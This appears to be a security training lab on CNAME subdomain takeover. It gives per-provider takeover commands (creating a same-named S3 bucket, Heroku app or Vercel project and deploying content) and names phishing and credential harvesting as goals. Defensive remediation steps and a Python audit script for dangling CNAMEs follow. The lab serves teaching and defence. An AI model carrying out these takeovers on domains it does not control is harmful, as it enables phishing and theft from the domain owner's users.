Lab 2: CNAME Subdomain Takeover

CNAME subdomain takeover vulnerabilities

Difficulty: Medium

Lab Overview

This lab demonstrates CNAME subdomain takeover vulnerabilities where attackers can take control of subdomains that point to external services via CNAME records.

Objective: Understand how CNAME subdomain takeover attacks work and how to exploit them.


This lab demonstrates CNAME subdomain takeover vulnerabilities:

  • CNAME Misconfiguration - A record pointing at an external service that was never provisioned
  • Service Deletion - The service is deleted but the CNAME record still points at it
  • Weak Authentication - The external service does not require proof of domain ownership before a hostname can be claimed
  • No Validation - Nobody checks that existing CNAME targets still resolve to a resource the organization controls
Vulnerable Services

Common vulnerable services (all rated High Risk in this lab):

  • *.s3.amazonaws.com - AWS S3 Bucket
  • *.herokuapp.com - Heroku App
  • *.github.io - GitHub Pages
  • *.netlify.app - Netlify Site
  • *.vercel.app - Vercel Site
  • *.firebaseapp.com - Firebase Hosting
  • *.cloudfront.net - AWS CloudFront
  • *.fastly.com - Fastly CDN
  • *.akamai.net - Akamai CDN
CNAME Subdomain Takeover Techniques

CNAME Enumeration

    # Enumerate CNAME records
    dig subdomain.example.com CNAME
    nslookup -type=CNAME subdomain.example.com
    host -t CNAME subdomain.example.com

Service Detection

    # Detect vulnerable services
    # Look for CNAME targets matching patterns like:
    # - *.s3.amazonaws.com
    # - *.herokuapp.com
    # - *.github.io
    # - *.netlify.app

Service Verification

    # Verify service existence
    curl -I https://subdomain.example.com
    # Look for 404 errors or "NoSuchBucket" errors

Service Registration

    # Register vulnerable service
    # 1. Create account on service
    # 2. Register subdomain name
    # 3. Deploy malicious content
    # 4. Verify takeover

Content Deployment

    # Deploy malicious content
    # - Phishing pages
    # - Malware distribution
    # - Credential harvesting
    # - XSS payloads

Impact Assessment

    # Assess takeover impact
    # - Brand reputation damage
    # - Credential theft
    # - Phishing attacks
    # - SEO manipulation

Vulnerability Details
  • Type: CNAME Subdomain Takeover
  • Severity: Medium
  • Method: CNAME misconfiguration
  • Issue: Service deletion without CNAME cleanup
Attack Vectors
  • CNAME Enumeration: Find CNAME records
  • Service Detection: Detect vulnerable services
  • Service Verification: Verify service existence
  • Service Registration: Register vulnerable service
CNAME Subdomain Takeover Examples

Use these techniques to exploit CNAME subdomain takeover vulnerabilities:

1. CNAME Enumeration:

    # Enumerate CNAME records
    dig subdomain.example.com CNAME
    nslookup -type=CNAME subdomain.example.com
    host -t CNAME subdomain.example.com
    # Use tools like:
    # - subjack
    # - takeover
    # - subzy
    # - subdomain-takeover

2. AWS S3 Bucket CNAME Takeover:

    # Check S3 bucket CNAME
    dig subdomain.example.com CNAME
    # If CNAME points to *.s3.amazonaws.com
    # Check if bucket exists
    aws s3 ls s3://subdomain.example.com
    # If bucket doesn't exist:
    # 1. Create S3 bucket with same name
    # 2. Upload malicious content
    # 3. Verify takeover
    # Example:
    aws s3 mb s3://subdomain.example.com
    echo "Subdomain Takeover" > index.html
    aws s3 cp index.html s3://subdomain.example.com/
    aws s3 website s3://subdomain.example.com --index-document index.html

3. Heroku App CNAME Takeover:

    # Check Heroku app CNAME
    dig subdomain.example.com CNAME
    # If CNAME points to *.herokuapp.com
    # Check if app exists
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Heroku app
    # 2. Deploy malicious content
    # 3. Verify takeover
    # Example:
    heroku create subdomain-example-com
    echo "Subdomain Takeover" > index.html
    git init
    git add .
    git commit -m "Initial commit"
    git push heroku main

4. GitHub Pages CNAME Takeover:

    # Check GitHub Pages CNAME
    dig subdomain.example.com CNAME
    # If CNAME points to *.github.io
    # Check if site exists
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create GitHub repository
    # 2. Enable GitHub Pages
    # 3. Upload malicious content
    # 4. Verify takeover
    # Example:
    git init
    echo "Subdomain Takeover" > index.html
    git add .
    git commit -m "Initial commit"
    git push origin main
    # Enable GitHub Pages in repository settings

5. Netlify Site CNAME Takeover:

    # Check Netlify site CNAME
    dig subdomain.example.com CNAME
    # If CNAME points to *.netlify.app
    # Check if site exists
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Netlify site
    # 2. Upload malicious content
    # 3. Verify takeover
    # Example:
    # Upload files via Netlify dashboard
    # Or connect GitHub repository
    netlify deploy --dir . --prod

6. Vercel Site CNAME Takeover:

    # Check Vercel site CNAME
    dig subdomain.example.com CNAME
    # If CNAME points to *.vercel.app
    # Check if site exists
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Vercel project
    # 2. Deploy malicious content
    # 3. Verify takeover
    # Example:
    vercel --prod
    # Or connect GitHub repository

7. Firebase Hosting CNAME Takeover:

    # Check Firebase site CNAME
    dig subdomain.example.com CNAME
    # If CNAME points to *.firebaseapp.com
    # Check if site exists
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Firebase project
    # 2. Deploy malicious content
    # 3. Verify takeover
    # Example:
    firebase init hosting
    firebase deploy

8. AWS CloudFront CNAME Takeover:

    # Check CloudFront CNAME
    dig subdomain.example.com CNAME
    # If CNAME points to *.cloudfront.net
    # Check if distribution exists
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create CloudFront distribution
    # 2. Configure origin
    # 3. Deploy malicious content
    # 4. Verify takeover
    # Example:
    aws cloudfront create-distribution --distribution-config file://config.json

9. Fastly CDN CNAME Takeover:

    # Check Fastly CNAME
    dig subdomain.example.com CNAME
    # If CNAME points to *.fastly.com
    # Check if service exists
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Fastly service
    # 2. Configure backend
    # 3. Deploy malicious content
    # 4. Verify takeover

10. Akamai CDN CNAME Takeover:

    # Check Akamai CNAME
    dig subdomain.example.com CNAME
    # If CNAME points to *.akamai.net
    # Check if service exists
    curl -I https://subdomain.example.com
    # If 404 error:
    # 1. Create Akamai property
    # 2. Configure origin
    # 3. Deploy malicious content
    # 4. Verify takeover

11. Automated CNAME Takeover Detection:

    # Use automated tools
    # - subjack
    # - takeover
    # - subzy
    # - subdomain-takeover
    # Example with subjack:
    subjack -w subdomains.txt -t 100 -o results.txt
    # Example with takeover:
    takeover -l subdomains.txt -t 10
    # Example with subzy:
    subzy run --targets subdomains.txt

12. Manual CNAME Verification:

    # Manual verification steps
    # 1. Check CNAME records
    # 2. Verify service existence
    # 3. Test for 404 errors
    # 4. Attempt service registration
    # 5. Confirm takeover
    # 6. Document findings
    # Example verification:
    dig subdomain.example.com CNAME
    curl -I https://subdomain.example.com
    # Check response for 404 or service errors

13. CNAME Takeover Prevention:

    # Prevent CNAME takeovers
    # 1. Regular DNS auditing
    # 2. Service monitoring
    # 3. Proper cleanup procedures
    # 4. DNS security controls
    # 5. Subdomain monitoring
    # Example monitoring:
    # - Set up DNS monitoring
    # - Monitor for CNAME changes
    # - Alert on service deletions
    # - Regular security scans

14. CNAME Takeover Impact:

    # Assess takeover impact
    # - Brand reputation damage
    # - Credential theft potential
    # - Phishing attack vectors
    # - SEO manipulation
    # - Trust and security implications
    # Document findings:
    # - Vulnerable CNAME records
    # - Affected services
    # - Potential impact
    # - Remediation steps

15. CNAME Takeover Remediation:

    # Remediate CNAME takeovers
    # 1. Remove vulnerable CNAME records
    # 2. Point to secure services
    # 3. Implement proper monitoring
    # 4. Regular security audits
    # 5. DNS security controls
    # Example remediation:
    # - Delete vulnerable CNAME
    # - Point to secure A record
    # - Set up monitoring
    # - Regular security scans

Mitigation Strategies
  • Regular CNAME record auditing and cleanup
  • Implement proper subdomain monitoring
  • Use secure service configurations
  • Implement proper authentication and authorization
  • Regular security testing and vulnerability assessments
  • Monitor for unusual subdomain activity
  • Implement proper DNS security controls
  • Use secure coding practices
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use CNAME takeover detection tools
  • Implement proper audit trails
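As an added defensive example that is not part of the lab's own material, the audit below implements the detection logic behind "Regular DNS auditing" and "Automated CNAME Takeover Detection" for your own zone export: it maps each CNAME target to a listed provider, treats a target that no longer resolves as the strongest dangling signal, and otherwise checks the provider's "no tenant" response. The resolver and HTTP fetcher are injected so the code runs offline against constructed sample data; every provider error string except NoSuchBucket (which the lab quotes) is an assumption.

```python
# Provider suffixes come from the lab's list. The "no tenant" error text is an
# assumption for illustration, except NoSuchBucket, which the lab itself quotes.
PROVIDERS = {
    "s3.amazonaws.com": ("AWS S3", "NoSuchBucket"),
    "herokuapp.com": ("Heroku", "No such app"),
    "github.io": ("GitHub Pages", "There isn't a GitHub Pages site here"),
}

def provider_for(target):
    """Match a CNAME target against PROVIDERS (case-insensitive, suffix match only)."""
    host = target.rstrip(".").lower()
    for suffix, info in PROVIDERS.items():
        if host == suffix or host.endswith("." + suffix):
            return info
    return None

def classify(name, target, resolve, fetch):
    """Verdict for one CNAME record: 'external', 'ok', or a 'DANGLING: ...' finding."""
    info = provider_for(target)
    if info is None:
        return "external"  # not a fingerprinted provider; review by hand
    service, fingerprint = info
    if resolve(target) is None:
        # Strongest signal: the CNAME target itself no longer exists (NXDOMAIN).
        return f"DANGLING: {service} target {target} does not resolve"
    status, body = fetch(name)
    if status == 404 and fingerprint in body:
        # Target resolves, but the provider answers that nobody owns this hostname.
        return f"DANGLING: {service} reports no tenant for {name}"
    return "ok"

def audit(zone, resolve, fetch):
    """Classify every CNAME in a zone export; returns {subdomain: verdict}."""
    return {n: classify(n, t, resolve, fetch) for n, t in zone.items()}
# Constructed sample data standing in for a real zone export, DNS and HTTP answers.
SAMPLE_ZONE = {
    "assets.example.com": "example-assets.s3.amazonaws.com",  # bucket deleted
    "app.example.com": "old-app.herokuapp.com",               # app hostname gone
    "docs.example.com": "example-org.github.io",              # still in use
    "www.example.com": "www.example.com.cdn.example.net",     # unlisted provider
}
SAMPLE_A = {"example-assets.s3.amazonaws.com": "203.0.113.10",
            "example-org.github.io": "203.0.113.20", "www.example.com.cdn.example.net": "203.0.113.30"}
SAMPLE_HTTP = {"assets.example.com": (404, "<Code>NoSuchBucket</Code>"),
               "docs.example.com": (200, "<html>docs</html>")}
sample_resolve = SAMPLE_A.get                    # None stands in for NXDOMAIN
sample_fetch = lambda host: SAMPLE_HTTP.get(host, (200, ""))
if __name__ == "__main__":
    for sub, verdict in audit(SAMPLE_ZONE, sample_resolve, sample_fetch).items():
        print(f"{sub:20} {verdict}")
```

In production, pass a real DNS lookup (returning None on NXDOMAIN) and an HTTP GET for the two callables, and extend PROVIDERS with the fingerprints of every service your organization actually delegates to.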